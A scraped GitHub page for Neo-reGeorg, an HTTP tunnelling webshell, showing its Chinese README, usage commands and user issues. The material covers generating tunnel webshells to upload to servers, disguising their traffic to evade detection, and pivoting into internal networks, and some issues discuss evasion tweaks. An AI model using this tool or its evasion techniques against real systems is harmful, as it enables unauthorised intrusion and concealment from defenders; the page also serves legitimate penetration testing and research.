l-codes / neo-regeorg Goto Github PK

View Code? Open in Web Editor NEW

2.7K 34.0 431.0 402 KB

Neo-reGeorg is a project that seeks to aggressively refactor reGeorg

License: GNU General Public License v3.0

Python 31.83% Java 31.85% PHP 4.74% ASP.NET 15.93% Go 5.42% C# 10.23%

regeorg neoreg reduh socks-proxy web-tunnel http-tunnel http-redirect

neo-regeorg's Introduction

Neo-reGeorg

简体中文　｜　English

Neo-reGeorg 是一个旨在积极重构 reGeorg 的项目，目的是：

提高可用性，避免特征检测
提高 tunnel 连接安全性
提高传输内容保密性
应对更多的网络环境场景下使用

此工具仅限于安全研究和教学，用户承担因使用此工具而导致的所有法律和相关责任！作者不承担任何法律和相关责任！

Version

5.2.0 - 版本修改日志

Features

传输内容经过变形 base64 加密，伪装成 base64 编码
采用 BLV (Byte-LengthOffset-Value) 数据格式传输数据
直接请求响应可定制化 (如伪装的404页面)
支持 Request 模板
HTTP Headers 可定制化
自定义 HTTP 响应码
多 URL 随机请求
服务端 DNS 解析
兼容 python2 / python3
服务端环境的高兼容性，如服务器不稳定、负载均衡下只在部分机器上部署了服务端等特殊情况
(仅 php) 参考 pivotnacci 实现单 Session 创建多 TCP 连接，应对部分负载均衡场景
aspx/ashx/jsp/jspx 已不再依赖 Session，可在无 Cookie 等恶劣环境正常运行
(非 php) 支持内网转发，应对负载均衡环境
支持进程形式启动服务端，应对更多场景

Basic Usage

Step 1. 设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器

$ python neoreg.py generate -k password

    [+] Create neoreg server files:
       => neoreg_servers/tunnel.jsp
       => neoreg_servers/tunnel.jspx
       => neoreg_servers/tunnel.ashx
       => neoreg_servers/tunnel.aspx
       => neoreg_servers/tunnel.php
       => neoreg_servers/tunnel.go

Step 2. 使用 neoreg.py 连接 WEB 服务器，在本地建立 socks5 代理

$ python3 neoreg.py -k password -u http://xx/tunnel.php
+------------------------------------------------------------------------+
  Log Level set to [DEBUG]
  Starting socks server [127.0.0.1:1080]
  Tunnel at:
    http://xx/tunnel.php
+------------------------------------------------------------------------+

Advanced Usage

支持生成的服务端，默认直接请求响应指定的页面内容 (如伪装的 404 页面)

$ python neoreg.py generate -k <you_password> --file 404.html --httpcode 404
$ python neoreg.py -k <you_password> -u <server_url> --skip

如服务端 WEB，需要设置代理才能访问

$ python neoreg.py -k <you_password> -u <server_url> --proxy socks5://10.1.1.1:8080

如需 Authorization 认证和定制的 Header 或 Cookie

$ python neoreg.py -k <you_password> -u <server_url> -H 'Authorization: cm9vdDppcyB0d2VsdmU=' --cookie "key=value;key2=value2"

需要分散请求，可上传到多个路径上，如内存马

$ python neoreg.py -k <you_password> -u <url_1> -u <url_2> -u <url_3> ...

开启内网转发，应对负载均衡

$ python neoreg.py -k <you_password> -u <url> -r <redirect_url>

使用端口转发功能，非启动 socks5 服务 ( 127.0.0.1:1080 -> ip:port )

$ python neoreg.py -k <you_password> -u <url> -t <ip:port>

设置请求内容模板 ( generate 的时候需要指定上)

# 请求内容会替换到 NEOREGBODY 中
$ python3 neoreg.py -k password -T 'img=data:image/png;base64,NEOREGBODY&save=ok'
$ python3 neoreg.py -k password -T 'img=data:image/png;base64,NEOREGBODY&save=ok' -u http://127.0.0.1:8000/anysting

# NOTE 允许将模板内容写入文件中 -T file 即可

支持创建进程另起 Neoreg 服务端，可应对恶劣的特殊环境 (自行脑补) :)

$ go run neoreg_servers/tunnel.go 8000
$ python3 neoreg.py -k password -u http://127.0.0.1:8000/anysting

更多关于性能和稳定性的参数设置参考 -h 帮助信息

# 生成服务端脚本
$ python neoreg.py generate -h
    usage: neoreg.py [-h] -k KEY [-o DIR] [-f FILE] [-c CODE] [--read-buff Bytes]
                     [--max-read-size KB]

    Generate neoreg webshell

    optional arguments:
      -h, --help            show this help message and exit
      -k KEY, --key KEY     Specify connection key.
      -o DIR, --outdir DIR  Output directory.
      -f FILE, --file FILE  Camouflage html page file
      -c CODE, --httpcode CODE
                            Specify HTTP response code. When using -r, it is
                            recommended to <400 (default: 200)
      -T STR/FILE, --request-template STR/FILE
                            HTTP request template (eg:
                            'img=data:image/png;base64,NEOREGBODY&save=ok')
      --read-buff Bytes     Remote read buffer (default: 513)
      --max-read-size KB    Remote max read size (default: 512)

# 连接服务端
$ python neoreg.py -h
    usage: neoreg.py [-h] -u URI [-r URL] [-R] [-t IP:PORT] -k KEY [-l IP]
                     [-p PORT] [-s] [-H LINE] [-c LINE] [-x LINE]
                     [--php] [--php-connect-timeout S] [--local-dns] [--read-buff KB]
                     [--read-interval MS] [--write-interval MS] [--max-threads N]
                     [--max-retry N] [--cut-left N] [--cut-right N]
                     [--extract EXPR] [-v]

    Socks server for Neoreg HTTP(s) tunneller (DEBUG MODE: -k debug)

    optional arguments:
      -h, --help            show this help message and exit
      -u URI, --url URI     The url containing the tunnel script
      -r URL, --redirect-url URL
                            Intranet forwarding the designated server (only
                            java/.net)
      -R, --force-redirect  Forced forwarding (only -r)
      -t IP:PORT, --target IP:PORT
                            Network forwarding Target, After setting this
                            parameter, port forwarding will be enabled
      -k KEY, --key KEY     Specify connection key
      -l IP, --listen-on IP
                            The default listening address (default: 127.0.0.1)
      -p PORT, --listen-port PORT
                            The default listening port (default: 1080)
      -s, --skip            Skip usability testing
      -H LINE, --header LINE
                            Pass custom header LINE to server
      -c LINE, --cookie LINE
                            Custom init cookies
      -x LINE, --proxy LINE
                            Proto://host[:port] Use proxy on given port
      -T STR/FILE, --request-template STR/FILE
                            HTTP request template (eg:
                            'img=data:image/png;base64,NEOREGBODY&save=ok')
      --php                 Use php connection method
      --php-connect-timeout S
                            PHP connect timeout (default: 0.5)
      --local-dns           Use local resolution DNS
      --read-buff KB        Local read buffer, max data to be sent per POST
                            (default: 7, max: 50)
      --read-interval MS    Read data interval in milliseconds (default: 300)
      --write-interval MS   Write data interval in milliseconds (default: 200)
      --max-threads N       Proxy max threads (default: 400)
      --max-retry N         Proxy max threads (default: 10)
      --cut-left N          Truncate the left side of the response body
      --cut-right N         Truncate the right side of the response body
      --extract EXPR        Manually extract BODY content (eg:
                            <html><p>NEOREGBODY</p></html> )
      -v                    Increase verbosity level (use -vv or more for greater
                            effect)

Remind

Mac OSX 上运行 neoreg.py 时，高并发请求会出现网络丢包情况，可通过 ulimit -n 2560 修改当前 shell 的 "最大文件打开数"

License

GPL 3.0

Star History Chart

neo-regeorg's People

Contributors

Stargazers

Watchers

Forkers

attackgithub j5s bravery9 0xmaohou cream-sec lwzxs localurk r4b3rt 2u0y0u mkv4 nr4v3n v1cker helloexp av1080p luciker wang0098 fbion codechina888 websec123 ba0zi m00zh33 nothingsec kernux aqqdgyz 123xiaoyi jonathanzhou348 pickpickoneday killvxk seabreg raystyle b0q1 h1d3r laneldb wisdark sry309 runonceex amjiyu xundididi quinn-yan eniac888 icysun ajdecade no0d1es whoamisysteminfo wj158 kyhvedn 98kstar maxxxxxx123 briteming tr33-he11 imnewer w20di madkarl vkbiu listenquiet 0neatsec omiter hmp456123 exi1sh0w qianzhaorong k1p2y3 rockmelodies adamxxoo fuck123fuckabc adminstrat missxq131 pyking peges tears2015 heyzm m3g4byt3 fstac report090 heznd sirpedrotavares jack51706 chesterzc yumingyuan foreverluck katsec freefv akunwin residuallaugh yu5239 selfevo c0d1007 do0dl3 aixueyou chixxx nbchengit lucifer315 sevck ppuuoo qianniaoge hstwo fuzz-security ios1024 c0demake flying0er isiaon

neo-regeorg's Issues

报错Georg is not ready, please check URL.

Log Level set to [ERROR]
Starting SOCKS5 server [127.0.0.1:1080]
Tunnel at:
http://120.202.xxx.xxx:8080/admin/css/index1.jsp
+------------------------------------------------------------------------+
[ERROR ] Georg is not ready, please check URL.

iis+php环境无法使用

生成的php马好像只能使用在apache服务器的环境下。

应对容器对数据返回前后追加内容的解决办法

遇到问题

在使用Neo-reGeorg进行实战时遇到了一个bug，目标服务器在返回的http数据中，强行把原始的页面代码前后加入了一些html标签。导致neoreg.py在读取数据进行解码时出现错误，无法完成代理。
返回数据类似于这样：

<html><p>原始base64数据Hr862cRcRES_9AFMojsEHA</p></html>

错误信息：

解决思路

我阅读了neoreg.py源代码和对应的webshell源代码，尝试修改，通过在返回数据中加入标识，再使用正则匹配来解决这个问题。

修改neoreg.py

# 在session类的reader函数中，加入数据处理函数
def mapping_body(self, data):
    re_pattern = self.session_mark() + r'(.*?)' + self.session_mark()  # 使用内置的mark关键值对响应数据进行处理
    re_metch_result = re.search(re_pattern, data)
    if re_metch_result:
        return re_metch_result.group(1)
    else:
        return ''

# 使用新加函数对requests返回数据的处理
if status == V["OK"]:
    data = self.mapping_body(response.content) # 添加mapping_body函数，正则处理返回数据
    if len(data) == 0:
        sleep(READINTERVAL)
        continue
    else:
        data = self.decode_body(data)

修改templates/tunnel.php

// 直接修改echo
if ($running) {
    header('X-STATUS: OK');
    header("Connection: Keep-Alive");
    echo $mark . strtr(base64_encode($readBuffer), $en, $de) . $mark;  // 直接拼接mark
} else {
    header('X-STATUS: FAIL');
}

修改templates/tunnel.aspx

while (c > 0) {
    byte[] newBuff = new byte[c];
    System.Buffer.BlockCopy(readBuff, 0, newBuff, 0, c);
    string b64 = Convert.ToBase64String(newBuff);
    Response.BinaryWrite(mark + Encoding.Default.GetBytes(StrTr(b64, en, de)) + mark); // 输出时拼接mark关键字 
    readLen += c;
    if (c < READBUF || readLen >= maxRead)
        break;
    c = s.Receive(readBuff);
}

修改templates/tunnel.ashx

while (c > 0) {
    byte[] newBuff = new byte[c];
    System.Buffer.BlockCopy(readBuff, 0, newBuff, 0, c);
    string b64 = Convert.ToBase64String(newBuff);
    context.Response.BinaryWrite(mark + System.Text.Encoding.Default.GetBytes(StrTr(b64, en, de)) + mark ); // 输出时拼接mark关键字 
    readLen += c;
    if (c < READBUF || readLen >= maxRead)
        break;
    c = s.Receive(readBuff);
}

修改templates/tunnel.jsp

无

修改templates/tunnel.jspx

无

还需要解决

在处理jsp和jspx脚本时，发现脚本使用ClassLoader的方式进行加载，无法直接修改
能否提供jsp、jspx版本的中clazzBytes对用原始代码，或者提供修改后byteArray

好像是证书报错，然后sockscap就连接不上

不知道对连接有影响吗？
/usr/lib/python3/dist-packages/urllib3/connectionpool.py:794: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.org/en/latest/security.html
InsecureRequestWarning)

php7.3 下用tunnel.nosocket.php会卡住，

php7.0及以下可以正常使用，但是php7.3会卡住
burp抓包的话会看到READ指令一直读不到返回

Godzilla 功能建议

我可以把Neo-reGeorg项目加到哥斯拉吗？

i got error 403 for all websites

+------------------------------------------------------------------------+
Log Level set to [WARNING]
Starting socks server [127.0.0.1:1080]
Tunnel at:
https://www.example.de/files/iamges/tunnel.ashx
+------------------------------------------------------------------------+
[ERROR ] [FORWARD] [216.58.215.238:80] HTTP [403]: Shutting down
[ERROR ] [FORWARD] [52.143.255.96:80] HTTP [403]: Shutting down

下载流量过大时，不能实时同步socket的IO内容

例如我们在Neo-reGeorg通道观看视频或者是下载较大的文件>20mb

我注意到服务端的在有数据的情况下总是在读取这会导致堵塞应当设置一个阀值达到这个阀值之后停止读取

你应该改成这样

aspx报错

The name 'HTTPCODE' does not exist in the current context

作者出个gui版本呀，

作者出个gui版本呀，输入url和密码就能启动

how to use -r ?

How to use the parameter -r ? Support Exchange aspx?
Example:
Load balancing
Server 1 is 19.16.1.120 with neo-regeorg test.aspx, intranet ip is 172.10.10.120
Server 2 is 19.16.1.121 without new-regeorg, intranet ip is 172.10.10.121

pthon3 neoreg.py -u https://19.16.1.120/test.aspx -k passssss-r https://172.10.10.120/test.aspx

If it accessed 19.16.1.121, got 404:
[INFO] Checking if Georg is ready
[WARNING] Using redirection will affect performance when the response code >= 400
[WARNING] Expect Response: b''
[WARNING] Real Response: b'\r\n\r\n \r\n <title>The resource cannot be found.</title>\r\n <'
[ERROR] Georg is not ready, please check URL and KEY. rep: [404] Not Found
[ERROR] You can set the --skip parameter to ignore errors

If it accessed 19.16.1.120, got 200, but Response is null:
[INFO] Checking if Georg is ready
[WARNING] Expect Response: b''
[WARNING ] Real Response: b''
[ERROR] Georg is not ready, please check URL and KEY. rep: [200] OK
[ERROR] You can set the --skip parameter to ignore errors

But if I do not use -r, and if it accessed 19.16.1.120, everything is right.

Readme translation

This improved version looks sick, can you just translate the README in english please? Or move the actual readme to README.XX.md where XX is the country code of the language it is written and make a README.md or README.en.md in english.

本地连接一直报错

win10 ，python3.7环境
[�[1m�[1;31mERROR�[0m �[0m] Georg is not ready, please check url. rep: [404] Not Found

在docker wordpress容器下不成功，，

在docker wordpress容器下不成功，，
我用的 wordpress 镜像是 wordpress:php7.2-apache
举例：我通过代理 putty 去连 192.168.1.4 : 22
在 192.168.1.4 机器上能看到 22已经建立连接,但是没有数据包返回，一直卡在那，
该怎么破！！

报错了

conn.headers['Accept-Encoding'] = 'gzip, deflate' 存在问题

当网站不支持gzip压缩时，会报错Georg is not ready, please check URL.
需要改conn.headers['Accept-Encoding'] = '' 可正常连接

请求支持云函数

云函数的出口IP会一直变化，如果能在云函数上运行reGeorg，意味着可以完美隐藏自己IP。
具体原理可参考：白嫖CDN，打造封不尽IP的代理池
其中一个实现：https://github.com/Sakurasan/scf-proxy
但scf-proxy仅支持http协议，如果是reGeorg，还可以支持任意tcp协议

在docker wordpress 容器下不成功，

https error

[�[1m�[1;31mERROR�[0m �[0m] 'Failed connecting to target'
[�[1m�[1;31mERROR�[0m �[0m] [127.0.0.1:443] Remote failed
[�[1m�[1;31mERROR�[0m �[0m] 'Failed connecting to target'
[�[1m�[1;31mERROR�[0m �[0m] [127.0.0.1:443] Remote failed
[�[1m�[1;31mERROR�[0m �[0m] 'Failed connecting to target'
[�[1m�[1;31mERROR�[0m �[0m] [127.0.0.1:443] Remote failed
[�[1m�[1;31mERROR�[0m �[0m] 'Failed connecting to target'
[�[1m�[1;31mERROR�[0m �[0m] [127.0.0.1:443] Remote failed
[�[1m�[1;31mERROR�[0m �[0m] 'Failed connecting to target'
[�[1m�[1;31mERROR�[0m �[0m] [127.0.0.1:443] Remote failed

阿里云服务器

Can not connect to the server

jsp 和 jspx 脚本在 Confluence 环境下报错

怀疑是 Confluence 页面是在一个模板中导致无法执行部分代码

转发连远程桌面会出现如下错误

“由于数据加密错误,这个会话将结束。请重新连接到远程计算机。”

是否解决旧版本的reGeorg JSP脚本不支持weblogic中间件问题？

希望兼容原版reGeorg连接

希望兼容原版reGeorg连接，遇到了一个工具注入的原版regeorg内存马，给作者提lssues改成Neo-reGeorg无果。

换了一个没有负载均衡的php环境，还是报错

PHP版本5.3.8；浏览器可以正常访问，
curl http://114.114.114.114/watermark/201808/tunnel.php
返回
本机执行命令后显示连接正常，设置好proxifier后尝试连接114.114.114.114对应的192.168.8.51就报错
+------------------------------------------------------------------------+
Log Level set to [ERROR]
Starting socks server [127.0.0.1:8888], tunnel at [http://114.114.114.114/watermark/201808/tunnel.php]
+------------------------------------------------------------------------+
[�[1m�[1;33mCRITICAL�[0m�[0m] Bad KEY or non-neoreg server
[�[1m�[1;31mERROR�[0m �[0m] [RUN] [192.168.8.55:81] Remote failed
Exception in thread Thread-1:
Traceback (most recent call last):
File "C:\Python3.7.7\lib\threading.py", line 926, in _bootstrap_inner
self.run()
File "D:\Neo-reGeorg\neoreg.py", line 415, in run
if self.handleSocks(self.pSocket):
File "D:\Neo-reGeorg\neoreg.py", line 261, in handleSocks
return self.parseSocks5(sock)
File "D:\Neo-reGeorg\neoreg.py", line 225, in parseSocks5
raise RemoteConnectionFailed("[%s:%d] Remote failed" % (target, targetPortNum))
RemoteConnectionFailed: [192.168.8.55:81] Remote failed

不知是不是使用方法不对还是什么问题？确定连接key没有错，请指教。

NOT Cookie Response错误

系统：Windows10
环境：phpstudy_pro 8.1.0.6
php版本：php5.6.9和php7.3.4

[CRITICAL]  Bad KEY or non-neoreg server
[ERROR   ]  [RUN] [127.0.0.1:3389] [NOT Cookie Response] Remote failed
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python3.7/threading.py", line 926, in _bootstrap_inner
    self.run()
  File "neoreg.py", line 415, in run
    if self.handleSocks(self.pSocket):
  File "neoreg.py", line 261, in handleSocks
    return self.parseSocks5(sock)
  File "neoreg.py", line 225, in parseSocks5
    raise RemoteConnectionFailed("[%s:%d] [NOT Cookie Response] Remote failed" % (target, targetPortNum))
RemoteConnectionFailed: [127.0.0.1:3389] [NOT Cookie Response] Remote failed

tunnel.php和tunnel.nosocket.php都是一样的错误，用kali的LAMP倒是没问题。

一直不成功

提个小问题

看了一下源码，其实一些关键head头还是比较明显的

jdk <= 1.5.0 版本环境下编译失败

报错如下：

HTTP Status 500 -
type Exception report

message

description The server encountered an internal error () that prevented it from fulfilling this request.

exception

org.apache.jasper.JasperException: Unable to compile class for JSP

An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0

An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <NetworkInterface>

An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0

An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <InetAddress>

An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0

An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type List is not generic; it cannot be parameterized with arguments <String>

An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0

An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0

An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0

An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Can only iterate over an array or an instance of java.lang.Iterable


	org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:512)
	org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:377)
	org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
	org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
	org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
root cause

org.apache.jasper.JasperException: Unable to compile class for JSP

An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0

An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <NetworkInterface>

An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0

An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type Enumeration is not generic; it cannot be parameterized with arguments <InetAddress>

An error occurred at line: 2 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0

An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
The type List is not generic; it cannot be parameterized with arguments <String>

An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, parameterized types are only available if source level is 5.0

An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0

An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Syntax error, 'for each' statements are only available if source level is 5.0

An error occurred at line: 108 in the jsp file: /css/tunnelx.jsp
Generated servlet error:
Can only iterate over an array or an instance of java.lang.Iterable


	org.apache.jasper.compiler.DefaultErrorHandler.javacError(DefaultErrorHandler.java:84)
	org.apache.jasper.compiler.ErrorDispatcher.javacError(ErrorDispatcher.java:328)
	org.apache.jasper.compiler.JDTCompiler.generateClass(JDTCompiler.java:414)
	org.apache.jasper.compiler.Compiler.compile(Compiler.java:297)
	org.apache.jasper.compiler.Compiler.compile(Compiler.java:276)
	org.apache.jasper.compiler.Compiler.compile(Compiler.java:264)
	org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:563)
	org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:305)
	org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
	org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
	javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
	org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
note The full stack trace of the root cause is available in the Apache Tomcat/5.5.20 logs.

Apache Tomcat/5.5.20

大佬，weblogic10.3.6不支持，有啥解决方案

-h帮助信息写错了

      --local-dns           Local read buffer, max data to be sent per
                            POST.(default: 2048 max: 2600)
      --read-buff Bytes     Local read buffer, max data to be sent per
                            POST.(default: 2048 max: 2600)

这里面的--local-dns描述写错了

window+jboss+jdk1.6下500报错

OS 名称: Microsoft Windows Server 2012 R2 Datacenter
OS 版本: 6.3.9600 暂缺 Build 9600
java.runtime.version = 1.6.0_14-b08
jboss

使用冰蝎可以进行正向代理，neo会报错500

proxy 服务监听报错 Errno 10013

宝塔 php8.0 环境套的CF. 不知道为什么。不套CF也一样的结果。

Log Level set to [INFO]
Starting SOCKS5 server [127.0.0.1:1080]
Tunnel at:
https://www.xxxx.com/nat.php
+------------------------------------------------------------------------+
[INFO ] Checking if Georg is ready
[WARNING ] Server Session expired
[WARNING ] Automatically append Cookies: __cfduid=dcafee59db222c06c30d13673c175910f1613723661;PHPSESSID=1rp16km3ko7aagtn3ib62mnv9g;
[INFO ] Georg says, 'All seems fine'
[CRITICAL ] [Errno 10013]

请求支持 asp 的 agent 端

有些iis只支持asp，没配置.net

请求使用httpx替代requests,使用http2的多路复用

httpx 支持http2,
pip3 install httpx
pip3 install 'httpx[http2]'
requests.Session() 替换成 httpx.Client(http2=True)

使用http2的多路复用减少握手.

新版本存在trimDirectiveWhitespaces函数不适用于低版本jsp

t3.jsp:27:190: The attribute "trimDirectiveWhitespaces" is supported by JSP 2.1 or higher version.

提示Bad KEY or non-neoreg server

有个readme写错了的小问题

pytohn 把python写错了

你好，我key填写正确还是提示Bad KEY or non-neoreg server

建议对请求做更多的伪装

现在的包是这样的

GET /t.php HTTP/1.1
Host: myweibo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Ghqgvikywyowmvo: UiTmMveJTNWkkm8wRUn4VwHBfkng
Yuwjttakkvh: wmwm501dsNWz50F/Q9icFyI=
Cookie: PHPSESSID=7tpphjesf30a2rbudhodsl62ej;

请求头里这两项看起来就比较奇怪，移到Cookie里看上去要正常些

Ghqgvikywyowmvo: UiTmMveJTNWkkm8wRUn4VwHBfkng
Yuwjttakkvh: wmwm501dsNWz50F/Q9icFyI=

变成

GET /t.php HTTP/1.1
Host: myweibo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=7tpphjesf30a2rbudhodsl62ej; Ghqgvikywyowmvo=UiTmMveJTNWkkm8wRUn4VwHBfkng; Yuwjttakkvh= wmwm501dsNWz50F/Q9icFyI=

或者更进一步对这两行编码下，在Cookie里变成下面这样,Auth从一堆类似词里随机选取

GET /t.php HTTP/1.1
Host: myweibo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=7tpphjesf30a2rbudhodsl62ej; Auth=xxxxx

certificate verification problem

jsp(x) certificate verification problem:
Error 500 Internal Server Error.
When chek it with curl: , no errors.
How fix it?

php文件部分环境下载最后可能存在空行

Linux下clone
生成的php脚本最后会有一行空行
导致没有数据时总是返回 '\n'
去掉最后的空行或者让脚本不闭合就可以了

建议弄个图形化界面版

类似冰蝎、哥斯拉，输入url、密码、监听端口，方便批量管理和重复利用

php5.6nts 环境无法正常使用

Windows + PHP 环境下，代理目标端口关闭，socks层不返回closed包

用frp做代理扫描端口时，连接失败后，会返回failed

但用neo做代理扫端口时，因为没有failed返回，会提示端口开放。

bug?

python neoreg.py generate -k password -f 404.html --httpcode 404

[ Github ] https://github.com/L-codes/neoreg

+------------------------------------------------------------------------+
Log Level set to [INFO]
Starting socks server [127.0.0.1:1080]
Tunnel at:
http://192.168.122.1:8080/tunnel.jsp
+------------------------------------------------------------------------+
[INFO ] Checking if Georg is ready
Traceback (most recent call last):
File "neoreg.py", line 673, in
askGeorg(conn, urls, redirect_urls)
File "neoreg.py", line 461, in askGeorg
log.error('Expect Response: ' + BASICCHECKSTRING[0:100])
TypeError: can only concatenate str (not "bytes") to str

404.html content:
page is not found!